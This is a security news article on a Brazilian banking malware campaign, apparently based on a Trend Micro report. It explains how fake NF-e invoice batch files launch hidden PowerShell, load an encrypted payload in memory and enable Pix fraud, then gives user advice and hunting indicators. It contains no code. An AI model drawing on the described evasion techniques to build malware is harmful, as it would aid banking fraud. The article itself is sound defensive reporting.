Banana RAT uses fake NF-e invoices to target Brazilian banking customers

A Brazilian banking malware campaign is using fake NF-e invoice lures to trick victims into running malicious batch files on Windows systems. The malware, known as Banana RAT, gives attackers remote access for live banking fraud, surveillance, credential theft, and Pix payment manipulation.

The Trend Micro report tracks the activity cluster as SHADOW-WATER-063 and says researchers mapped the full operation by analyzing both attacker-side infrastructure and victim-side malware telemetry.

The attack starts with a file named Consultar_NF-e.bat, which pretends to help the victim check a Brazilian electronic invoice. Once opened, it launches a hidden PowerShell chain that downloads and runs Banana RAT in memory.

Why the NF-e lure works in Brazil

NF-e, or Nota Fiscal Eletrônica, is a familiar part of Brazilian business life. The official NF-e portal is used to share information about the national electronic invoice system, which makes invoice-themed lures more believable for local users.

Attackers are abusing that trust. A victim who receives an unexpected invoice file through WhatsApp, a phishing link, or another messaging channel may assume it relates to a purchase, delivery, tax record, or business transaction.

The file name is also carefully chosen. Consultar_NF-e.bat looks like a simple invoice-checking script, but the .bat extension means Windows treats it as an executable batch file rather than a document.

Attack stage	What happens	Why it matters
Lure	Victim receives Consultar_NF-e.bat through WhatsApp or a phishing link.	The file mimics a trusted Brazilian invoice workflow.
Execution	The batch file runs hidden PowerShell commands.	The victim may not see a normal installer or warning flow.
Staging	A script downloads payload.php and msedge.txt from attacker infrastructure.	The chain separates delivery, staging, and final payload execution.
In-memory loading	The payload is decrypted and executed without writing the plain malware to disk.	This weakens basic file-based detection.
Fraud control	Banana RAT connects to C2 and waits for operator commands.	Attackers can guide real-time banking fraud.

Banana RAT targets Brazilian banks and crypto platforms

Trend Micro said the operation focuses on Brazilian financial institutions rather than broad global infection. The malware targets 16 major Brazilian banks and several Brazil-localized cryptocurrency exchanges.

That narrow targeting suggests the operators built Banana RAT around local banking behavior, language, payment flows, and user expectations. It also explains why the malware includes a dedicated Pix subsystem.

Pix is Brazil’s instant payment system, managed by Banco Central do Brasil. The official Banco Central Pix page describes Pix as part of Brazil’s financial stability infrastructure, and its widespread use makes it a valuable target for fraud-focused malware.

The malware runs through a fileless PowerShell chain

The initial batch file starts a hidden PowerShell command. That command fetches a small staging script, which then downloads the next payload from attacker-controlled infrastructure.

The second-stage payload, identified as msedge.txt in the research, is encrypted with AES and decrypted in memory. This means the clear-text malware does not need to land on disk as a normal executable file.

The Trend Micro analysis says the malware uses layered obfuscation, AES-wrapped payloads, fileless PowerShell execution, and encrypted command-and-control communication to avoid detection.

Polymorphic builds weaken hash-based detection

Banana RAT’s server-side tooling does not appear to send the same file to every victim. Researchers found a FastAPI-based crypter service that keeps a pool of 100 to 200 ready builds and serves a unique payload for each request.

That design makes traditional hash-based blocking much less effective. If every served sample is byte-unique, defenders cannot rely only on one known file hash to catch the campaign.

• Each victim request can receive a unique payload.
• The malware uses several obfuscation layers before delivery.
• The final payload decrypts in memory instead of as a plain file.
• The C2 channel uses encrypted communication on port 443.
• The malware can fall back to hardcoded infrastructure if the main domain fails.

Banana RAT enables live banking fraud

Once active, Banana RAT gives operators tools for interactive fraud instead of simple background data theft. The malware can stream the victim’s screen, log keystrokes, control input, inject banking overlays, and monitor financial sessions.

The fake overlays are especially important. A victim may see a full-screen message that appears to come from a bank, telling them to wait, complete an update, or scan a code. Meanwhile, the operator can perform actions in the background.

The malware also includes Pix QR code interception. Since Pix payments often use QR codes for fast transfers, the malware can interfere with the payment flow and support real-time account-draining attempts.

Why Pix manipulation increases the risk

Pix is fast, widely used, and built for instant transfers. That convenience also gives fraud operators a narrow response window because transactions can complete quickly.

Banana RAT’s Pix-focused features show that the campaign was designed for the Brazilian market. It is not a generic remote access tool with a banking label attached. It includes localized fraud logic for Brazilian financial services.

The use of fake invoice lures, Brazilian Portuguese tooling, targeted bank overlays, and a Pix manipulation subsystem all point to an operation built around local banking habits.

How persistence works

After infection, Banana RAT establishes persistence through a hidden scheduled task. The task launches PowerShell repeatedly, allowing the malware chain to survive reboots and maintain access over time.

The malware also hides files in a path designed to look like legitimate Microsoft diagnostic storage. This blending tactic can make suspicious payloads harder to notice during a quick manual review.

Persistence or evasion method	Purpose
Hidden scheduled task	Relaunches the malware chain after infection.
PowerShell execution	Runs commands without a traditional visible installer.
In-memory decryption	Keeps the clear payload away from normal disk scanning.
Microsoft-like directory path	Helps malicious files blend into expected system locations.
Polymorphic payload generation	Creates unique samples that resist simple hash blocking.

What users should watch for

Brazilian users should treat unexpected invoice files with caution, especially when the file arrives through WhatsApp, social media, SMS, or an unknown link. A legitimate invoice flow should not require a user to run a .bat file.

Users should also pay attention during online banking sessions. Full-screen “security update” messages, unexpected QR code prompts, frozen input, or banking pages that behave unusually can indicate active fraud tooling.

• Do not run invoice files with .bat, .cmd, .ps1, .js, .vbs, or .scr extensions.
• Confirm invoices through the sender’s known official channel.
• Use banking apps and official portals directly instead of links from messages.
• Question any banking page that asks you to wait during a “security update.”
• Stop the transaction if a Pix QR code changes unexpectedly.
• Report suspicious banking behavior to the bank immediately.

What security teams should monitor

Security teams in Brazil should monitor for PowerShell stagers, unusual scheduled tasks, payloads written under Microsoft-like diagnostic paths, and outbound traffic to domains that imitate trusted software infrastructure.

Endpoint detection should focus on behavior, not only file names. Banana RAT’s polymorphic build process means one static hash may miss later payloads from the same campaign.

• Alert on batch files launching hidden PowerShell commands.
• Monitor PowerShell downloading scripts from external infrastructure.
• Hunt for msedge.txt, st.txt, st.php, and payload.php artifacts.
• Review scheduled tasks that launch PowerShell every minute.
• Inspect suspicious files under ProgramData Microsoft diagnostic paths.
• Block known Banana RAT C2 and staging infrastructure at the perimeter.
• Use behavior-based rules for screen capture, keylogging, and remote input control.

Why invoice-themed malware remains effective

Invoice lures work because they create urgency without looking unusual. Businesses expect invoices, consumers expect purchase records, and many users want to check a possible charge quickly.

In Brazil, NF-e adds another layer of credibility because users regularly encounter electronic invoice workflows. Attackers can exploit that familiarity by making the malware look like a routine document check.

The safest habit is to start from official services or known business portals. Users can search for information through the official NF-e portal rather than running scripts or opening executable invoice files from messages.

The bigger lesson from Banana RAT

Banana RAT shows how regional banking malware continues to evolve. The campaign combines local lures, fileless execution, polymorphic payload generation, encrypted C2, live operator control, and payment-system-specific fraud tools.

That mix makes it harder to stop with one layer of defense. Users need awareness, banks need fraud monitoring, and organizations need endpoint visibility that can detect suspicious PowerShell behavior before the attacker reaches a live banking session.

The campaign also shows why defenders should treat WhatsApp and messaging-app links as part of the phishing surface. Banking malware no longer needs to arrive only through email attachments.

For Brazilian users and financial institutions, the practical response is clear: block the known infrastructure, hunt for the staged PowerShell chain, warn customers about fake invoice files, and treat unexpected banking overlays or Pix QR code changes as urgent fraud signals.

FAQ